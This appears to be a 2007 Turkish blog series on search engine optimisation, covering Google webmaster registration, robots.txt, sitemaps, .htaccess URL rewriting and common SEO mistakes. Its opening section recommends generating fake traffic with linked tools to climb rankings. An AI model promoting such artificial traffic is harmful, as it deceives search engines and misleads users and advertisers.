Artificial Traffic : Siteniz üzerinde sahte trafik oluşturarak arama motorlarında üst sıralara çıkabilirsiniz. Bunu yapabilmek için çeşitli yazılım ve sitelerin linkleri :
http://clickingagent.com/cacamore.htmlhttp://ultimatetrafficsystem.com/http://www.expiredtraffic.com/Bu taktiklerin dışında kısa bir araştırmayla net üzerinde bedava link exchange yapan siteleri kullanabilir sitenize ekstra trafik sağlayacak yazılımlar kullanabilirsiniz.
spamgoogle.com adresinden link exchange yaptığınız sitenin ismini aratın eğer bulabilirseniz sakın o siteyle link exchange yapmayın eğer sizin siteniz o listede varsa siz zaten seo işinden vazgeçin :)
Bu sitede googleın kara listeye aldığı sitelerin adreslerini bulabilirsiniz.
Bad Seo
Bu bölümde çok yaygın olarak bilinmesine ve kullanılmasına karşın aslında hiç bir avantajı olmayan aksine sitenizi çok kısa sürede arama motorlarından uzaklaştıracak yöntemlerden bahsedeceğiz.
Tiny/Alt text : Resim dosyalarının tanıtım yazılarını gereksiz yere uzatmak artık arama motorları tarafından dikkate alınmadığı için örümcekleri sitenizden uzaklaştırmaktan başka bir işe yaramayacaktır.
Üstelik her resimde sürekli aynı uzun keyword dizilerini kullanmak kısa bir sürede arama motorlarından banlanmanıza yol açacaktır.
Comments Tag : Sayfaların üst kısımlarında yer alan <!-- ve --> içinde yer alan kullanıcıya görünmeyen ama arama motorlarının görebildiği tanımlama yazılarını gereksiz kelimelerle doldurmak artık örümcekler tarafından dikkate alınmadan geçildiğinden bir işe yaramayacaktır.
Meta Tag : Meta taglarda da gereksiz uzatılan yazılar arama motorları tarafından genellikle görmezden gelindiği için bir işe yaramayacaktır.
Page Title : Sayfa başlığınız örümcekler tarafından ilk görüntülenen kısımdır <title>...</title> arasında bulunan bu bölüm arama motorlarının artık sadece ilk 2-3 kelimeyi önemsemesinden dolayı örümcekleri kandıramaz.
Bold Text : Sitenizin misyonuyla ilgili bazı kelimeleri kalın olarak yazmak abartılmadığı sürece işe yarayan bir yöntemdir ama sürekli kalın yazı kullanmak kısa sürede örümcekleri sitenizden uzaklaştıracaktır.
Keyword Stuffing : Keywordların aşırı derecede uzatılması hem arama motorlarında alt sıralara düşmenize yol açacak hem de belli bir karakterden sonrası örümcekler tarafından dikkate alınmayacaktır.
Search Engine Optimization (part3) @ 22-06-2007 09:27
Bu yazıda genel olarak değineceğimiz şeyler
- Googlea kayıt olma ve yararlanabileceğimiz hizmetleri
- robots.txt
- sitemap.xml dosyaları
Google bildiğiniz gibi internetteki en kapsamlı arama motoru. İlk olarak google mühendisleri örümceklerin işini kolaylaştırıp web sitelerini daha hızlı indexlemek için webmasterların googlea kayıt yapabileceğini söylemişlerdi. Bu olayın fazla ilgi görmesi nedeniyle daha fazla kişiyi çekerek büyük ölçüde google sunucularını rahatlatmak ve webmasterlara kolaylık sunması açısından bu servisi geliştirdiler.
Kayıt olmak isteyen webmasterlar
http://www.google.com/webmasters/tools/adresinden kayıt olabilirler. Kayıt olduktan sonra google sizden google123456.html gibi bir dosyayı sitenizin root klasörüne atmanızı isteyecektir. Boş bir sayfaya bu ismi vererek hostunuza attıktan sonra aktif etme (verify) işleminiz tamamlanacaktır.
Not : Googlea kayıt olmak için bir gmail adresine sahip olmanız gerekmektedir.
Bunun bize sağladığı yararların başında googleın örümceklerinin sitemizi daha çabuk indekslemesi var ama bunun yanında aşağıda sıraladığım kolaylıklarıda webmasterlara sunuyor.
- Sitenizin kodlama, yönlendirme gibi hatalarını size göstererek bunları düzeltme imkanı sağlar daha öncede belirttiğimiz gibi bu hataların düzeltilmesi google örümceklerini daha çabuk çekecektir.
- Örümceklerin sitenizi hangi hızda indekslediğini, şu ana kadar ne kadarını indekslemiş olduğunu görebilirsiniz.
- Örümceklerin sitenize göre değerlendirdiği PageRank gibi istatistikleri takip edebilirsiniz.
- Sitenizin hangi kelimeler aratıldığında ne kadar üst sıralarda çıkacağı gibi bilgileri edinebilirsiniz.
- Google örümceklerinin sitenizin kelime içeriğini nasıl sıraladığını görebilirsiniz.
- Sitenizden dışarıya verdiğiniz linkleri kontrol edebilirsiniz.
- Sitemap.xml dosyasını kolayca google örümceklerine göstererek sitenizi isteidğiniz gibi ve hızlı bir şekilde indeksletebilirsiniz.
robots.txt dosyası oluşturmak arama motoru örümceklerinin sitemizi nasıl gezeceğini kontrol etmemize yarar.
ilk olarak robots.txt dosyamızı açıyoruz ilk olarak komut vermek istediğimiz örümcekleri seçiyoruz.
User-agent:google
User-agent:webcrawler
User-agent:*
Yukarıdaki satırlara baktığımızda ilk olarak komut vermek istediğim örümcekleri seçtiğimi görüyorsunuz, ilk satırda google botlarını ikinci satırda webcrawler botlarını yönlendirmek istemişim. 3. satırdaki "*" işareti ise bütün arama motorlarına emir vermek istediğimi söylüyor.
İlk satırda hangi arama motoru örümceklerini yönlendirmek istediğimi seçtikten sonra 2. bölümde komut vermeye başlayabiliriz.
Bu bölümde Allow komutuyla örümceklere izin verdiğimizi Disallow komutuyla ise arama motorlarını gösterdiğimiz sayfayı görmemezlikten gelmesini istiyoruz.
Allow:*
Disallow:cc_bilgileri.html
Disallow:/privacy
görüldüğü gibi ilk satırda arama motorlarına bütün sayfalarımızı görme yetkisi verirken 2. satırda cc_bilgileri.html sayfasının görüntülenmesini yasaklamışım. Aynı şekilde 3. satırda privacy klasörümün görüntülenmesini engelledim.
Robots.txt dosyasını arama motorlarında var gibi görünen ama aslında olmayan sayfalarınızın indexlenmesini engellemektede kullanabilirsiniz.
Bu da örümceklerin sayfanızı daha rahat ziyaret etmesini sağlayacaktır.
sitemap.xml dosyaları sitemizin genel olarak içeriğinin belirtilmesini sağlar bu da en çok arama motoru örümceklerine yol göstereceği için yararlı olur.
Bir sitemap dosyası oluşturarak googlea
www.google.com/webmasters/tools adresinden tanıtabiliriz. Böylece googleın sitemizi indekslerken daha hızlı olmasını ve bir yanlış yapmasını engellemiş oluruz.
Sitemap dosyası oluşturmak için internetten sitemap oluşturma programlarını kullanabilirsiniz.
Google tarafından önerilen ve çok kullanılan "GSiteCrawler" programı işinizi görecektir.
Search Engine Optimization (Part2)(.htaccess) @ 17-06-2007 06:40
.htaccess dosyaları sitenizin nasıl gezileceğikonusundaki talimatları hostunuza göstereceğiniz dosyadır diyebiliriz.
İşinize yarayacak .htaccess ipuçlarını
http://www.acikbilgi.com/2006/03/05/hta ... -ipuclari/ adresinden okuyabilirsiniz.
Benim htaccess dosyasında özellikle ilgileneceğim konu anlamlı linkler konusudur.
Anlamlı linkler sitenizdeki herhangi bir sayfanın browserda görünen linkini konuyla alakalı bir link ile değiştirir.
Örneğin sitemizdeki ssh tunnelling konusunu ziyaret etmek istediğinizde
http://www.syshole.com/index.php?entry= ... 601-085436linkini kullanmak arama motorlarına itici gelirken aynı sayfayı
http://www.syshole.com/ssh-tunnelling linkindende ziyaret edebilirsiniz bu da siteyi arama motorlarında ciddi anlamda yukarı taşıyacaktır.
Özellikle "ssh tunnelling" kelime grubuyla yapılan aramalarda kolaylıkla üst sıralarda görüneceksiniz.
Anlamlı linkleri oluşturmaya başlamadan önce istediğiniz .htaccess dosyasını pratik bir şekilde
http://cooletips.de/htaccess sayfasından oluşturabilirsiniz.
Anlamlı link oluşturma
öncelikle bir not defteri açarak istediğimiz düzenlemeleri yapacağız ve sonra bu dosyayı .htaccess adı altında sitemizin root dizinine atacağız.
Dosyamızın ilk satırı
"RewriteEngine on"
şeklinde olmalıdır tabi bunun çalışması için hostunuzun da rewriteengine modulunu destekliyor olması gerekir.
sonra linkini değiştirmek istediğimiz sayfaya göre
RewriteRule ^deneme.* /index.php?test=deneme
şeklinde yazarsak
www.xxx.com/deneme linki otomatik olarak
www.xxx.com/index.php?test=deneme linkini çağıracaktır.
Biraz daha karışık bir örnek vermek gerekirse
RewriteRule ^arabalar/(.*) /araba.php?model=$1
yazarsak
www.xxx.com/arabalar/... linki
www.xxx.com/araba.php?model=... linkini çağıracaktır.
Buradaki "..." girilen değişkene göre farklılık gösterir.
syshole.com için ufak bir .htaccess dosyası örneği vermek gerekirse
RewriteEngine on
RewriteRule ^network-sniffer-for-win32.* /index.php?entry=entry070401-214932
RewriteRule ^ssh-tunnelling.* /index.php?entry=entry070601-085436
RewriteRule ^wep-wpa-cracking.* /index.php?entry=entry070530-081216
RewriteRule ^cisco-hacking.* /index.php?entry=entry070511-085542
RewriteRule ^backtrack-2.* /index.php?entry=entry070511-083848
şeklinde yazılabilir.
Search Engine Optimization (Part 1) @ 17-06-2007 06:34
Harddiskimin ömrünü tüketmesi ve finaller nedeniyle yazı yazamadığım bir haftadan sonra seo yazı dizisiyle beraber tekrar devam ediyoruz.
Bu yazı dizisine başlamadan önce biraz tanıtalım search engine optimization sitenizin arama motorlarında daha yukarılarda çıkmasını sağlamak için geliştirilmiş yöntemlerdir.
Bunlar arama motorlarının örümceklerini sitenize çekmek ve sayfalarınızın daha çabuk indexlenmesini sağlamak mantığı üzerine kurulurlar.
Arama motorlarının örümceklerinin bir siteyi nasıl indexlediğini tam olarak kimse bilemez bunlar arama motorunun mühendisleri tarafından hazırlanır ve gizli tutulur fakat tecrübe yoluyla işe yarar yöntemler webmasterlar tarafından kullanılmaya çalışılır
Bu yazı dizisinde ilk bölümlerde arama motoru optimizasyonunun genel hatlarını inceleyeceğiz sonraki bölümlerde ise dark seo denilen arama motorlarını kandırma teknikleri incelenecek
ama bu noktada belirtmemiz gereken nokta, eğer geliştirmeye çalışacağınız bir siteniz varsa dark seo tekniklerini kullanmaktan kaçının çünkü arama motorlarının sitenizi kara listeye alması halinde önemli bir kaynağı kaybetmiş olacaksınız.
Dark seo teknikleri daha hızlı sonuca gitmeyi düşünen illegal içerikli sitelerde kullanılır genel olarak.
Örümceklerin sitenizi kolay indexlemesi için gereken bir iki püf noktayı hızlıca maddeler halinde anlatarak geçelim.
-Sitenizde iframe sayfalarını mümkün olduğunca az kullanmak örümceklerin siteyi daha hızlı ve kolay gezmelerini sağlayacaktır.
-Sitenizi gerekli gereksiz yüzlerce keywordla göstermeye çalışacağınıza sitenizin ne ile ilgili olduğunu gösteren keywordlar seçmeniz yararınıza olacaktır çünkü armaa motorları yeni geliştidikleri örümceklerle bu keywordların 200. karakterden sonrasını görmezden gelirler
-Bu keywordları tek kelime yerine anlamlı ve aratılması mümkün kelime grupları olarak seçmenizde işinize yarar. Ör: syshole.com için "internet teknolojileri güvenliği" gibi bir keyword kullanmak armama motorlarında bu tip bir kelime grubuyla arama yapıldığında sitenizi üst sıralara taşıyacaktır.
-Sitenizde java scriptleri az kullanmanız kullansanız bile sitenin kaynağına direkt olarak yapıştırmayıp başka bir linkten "xxx.com/seo.js" şeklinde çağırmanız sitenizin örümcekler tarafından kolay algılanmasını sağlayacaktır.
-Sitenizdeki resim dosyalarına alt text ile açıklama yazmanız bu resimlerin arama motorlarında daha kolay görüntülenmesini sağlar.
-Genellikle düz yazı kullanmanız yazıların öne çıkarmak istediğiniz kısımlarını kalın yazı tipiyle yazmanız yie örümceklerin sitenizi kolay gezmesini sağlayacaktır.
-Sitenizin kolay gezilebilmesi için sitenizin hızlı açılması örümcekleri daha hızlı şekilde kendine çekecektir.
-Özellikle başka sitelerden kopyala/yapıştır yaparak aldığınız içerikler sizi googleda alt sıralara itecektir.
-Ayrıca domain isminizin sitenin misyonuyla alakalı olması 8 harften kısa olması ve örneğin bir mp3 sitesiyse domainin içinde mp3 kelimesinin geçmeside arama motorlarında sizi üst sıralara çekecektir.
-Kodlama hatası ya da sitemapte ya da sitenin başka bir sayfasında var gösterilmiş ama aslında olmayan linklerde sizin için zararlı olacak ayrıntılardır.
Bu püf noktalara dikkat ettikten sonra htaccess dosyası düzenlemeye geçebiliriz.
